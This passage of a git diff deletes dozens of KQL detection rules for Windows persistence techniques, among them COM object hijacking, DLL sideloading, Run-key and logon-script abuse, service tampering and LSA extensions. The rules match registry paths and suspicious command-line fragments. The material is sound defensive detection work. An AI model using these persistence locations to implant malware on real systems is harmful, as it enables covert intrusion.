"C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql b/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql deleted file mode 100644 index c814590c..00000000 --- a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kutepov Anton, oscd.community -// Date: 2019/10/23 -// Level: medium -// Description: Detects COM object hijacking via TreatAs subkey -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "HKU" and RegistryKey contains "Classes\\CLSID" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql deleted file mode 100644 index 4ca5d408..00000000 --- a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql deleted file mode 100644 index 7d53df8f..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql deleted file mode 100644 index 85e52e34..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbghelp.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll")))) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql deleted file mode 100644 index bafb67b9..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql deleted file mode 100644 index d6f4a3c3..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql deleted file mode 100644 index 4d8a43ae..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql deleted file mode 100644 index 05e33118..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/Persistence/Potential_Libvlc.DLL_Sideloading.kql b/Persistence/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Persistence/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql b/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql deleted file mode 100644 index ac641f11..00000000 --- a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk -// Date: 2023/06/07 -// Level: high -// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql b/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql deleted file mode 100644 index 959bd914..00000000 --- a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/09 -// Level: medium -// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence -The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. - -// Tags: attack.persistence -DeviceFileEvents -| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql b/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql deleted file mode 100644 index bfd40122..00000000 --- a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/09/29 -// Level: medium -// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. -// Tags: attack.persistence, attack.t1543.003, attack.t1574.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath"))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql b/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql deleted file mode 100644 index a1a02521..00000000 --- a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/06/28 -// Level: medium -// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry -// Tags: attack.persistence, attack.t1547.001 -DeviceProcessEvents -| where ProcessCommandLine contains "reg" and ProcessCommandLine contains " ADD " and ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Using_DebugPath.kql b/Persistence/Potential_Persistence_Using_DebugPath.kql deleted file mode 100644 index 0a216f80..00000000 --- a/Persistence/Potential_Persistence_Using_DebugPath.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/07/27 -// Level: medium -// Description: Detects potential persistence using Appx DebugPath -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql b/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql deleted file mode 100644 index 28f8a0f1..00000000 --- a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/01/01 -// Level: medium -// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. -This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. -This can be potentially abused as a persistence mechanism. - -// Tags: attack.persistence, attack.t1546.011 -DeviceRegistryEvents -| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql b/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql deleted file mode 100644 index 33dfb797..00000000 --- a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/10 -// Level: high -// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence -The entries found under App Paths are used primarily for the following purposes. -First, to map an application's executable file name to that file's fully qualified path. -Second, to prepend information to the PATH environment variable on a per-application, per-process basis. - -// Tags: attack.persistence, attack.t1546.012 -DeviceRegistryEvents -| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_AutodialDLL.kql b/Persistence/Potential_Persistence_Via_AutodialDLL.kql deleted file mode 100644 index bea17672..00000000 --- a/Persistence/Potential_Persistence_Via_AutodialDLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/10 -// Level: high -// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql deleted file mode 100644 index f0cfbb39..00000000 --- a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql b/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql deleted file mode 100644 index b6360528..00000000 --- a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: high -// Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") and RegistryKey contains "\\CLSID" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql b/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql deleted file mode 100644 index b9526492..00000000 --- a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien -// Date: 2020/04/14 -// Level: medium -// Description: Detects potential COM object hijacking leveraging the COM Search Order -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where (RegistryKey contains "\\CLSID" and RegistryKey endswith "\\InprocServer32\\(Default)") and (not(((RegistryValueData endswith ":\\Windows\\system32\\dnssdX.dll" or RegistryValueData endswith ":\\Windows\\SysWOW64\\dnssdX.dll") or ((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (RegistryValueData contains "\\AppData\\Roaming\\Dropbox\\" and (RegistryValueData contains "\\DropboxExt64." and RegistryValueData contains ".dll")) or InitiatingProcessFolderPath endswith ":\\WINDOWS\\SYSTEM32\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdateComRegisterShell64.exe" or RegistryValueData contains ":\\WINDOWS\\system32\\GamingServicesProxy.dll" or (RegistryValueData contains "%%systemroot%%\\system32\\" or RegistryValueData contains "%%systemroot%%\\SysWow64\\") or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\SecurityHealthService.exe" or ((InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\regsvr32.exe") and RegistryKey endswith "\\InProcServer32\\(Default)") or RegistryValueData contains "\\FileRepository\\nvmdi.inf" or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" or RegistryValueData contains "\\FileCoAuthLib64.dll" or RegistryValueData contains "\\FileSyncShell64.dll" or RegistryValueData contains "\\FileSyncApi64.dll") or (RegistryValueData contains ":\\Windows\\System32\\Autopilot.dll" and InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe") or RegistryValueData endswith ":\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll" or RegistryValueData contains ":\\ProgramData\\Microsoft\\" or (RegistryValueData contains ":\\Program Files\\" or RegistryValueData contains ":\\Program Files (x86)\\") or (RegistryValueData endswith ":\\Windows\\pyshellext.amd64.dll" or RegistryValueData endswith ":\\Windows\\pyshellext.dll") or (RegistryValueData contains ":\\Windows\\System32\\SecurityHealth" and InitiatingProcessFolderPath endswith ":\\Windows\\system32\\SecurityHealthService.exe") or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\" and RegistryValueData contains "\\Microsoft.Teams.AddinLoader.dll") or RegistryValueData endswith "TmopIEPlg.dll" or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\wuauclt.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql b/Persistence/Potential_Persistence_Via_DLLPathOverride.kql deleted file mode 100644 index df77155d..00000000 --- a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql b/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql deleted file mode 100644 index 5d4ed302..00000000 --- a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql +++ /dev/null @@ -1,13 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. -The disk cleanup manager is part of the operating system. It displays the dialog box […] -The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. - -// Tags: attack.persistence -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files"))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql deleted file mode 100644 index 617d3ee9..00000000 --- a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/17 -// Level: medium -// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique -// Tags: attack.persistence, attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp"))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql b/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql deleted file mode 100644 index 4548866a..00000000 --- a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/01/15 -// Level: high -// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. -// Tags: attack.persistence, attack.t1137.006 -DeviceRegistryEvents -| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey endswith "\\Excel\\Options" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_GlobalFlags.kql b/Persistence/Potential_Persistence_Via_GlobalFlags.kql deleted file mode 100644 index 0af11ee9..00000000 --- a/Persistence/Potential_Persistence_Via_GlobalFlags.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Karneades, Jonhnathan Ribeiro, Florian Roth -// Date: 2018/04/11 -// Level: high -// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys -// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit")) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql b/Persistence/Potential_Persistence_Via_LSA_Extensions.kql deleted file mode 100644 index 8aa8287b..00000000 --- a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. -The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. - -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql deleted file mode 100644 index b8e4b63b..00000000 --- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tom Ueltschi (@c_APT_ure) -// Date: 2019/01/12 -// Level: high -// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence -// Tags: attack.persistence, attack.t1037.001 -DeviceProcessEvents -| where ProcessCommandLine contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql deleted file mode 100644 index ff92bcaa..00000000 --- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tom Ueltschi (@c_APT_ure) -// 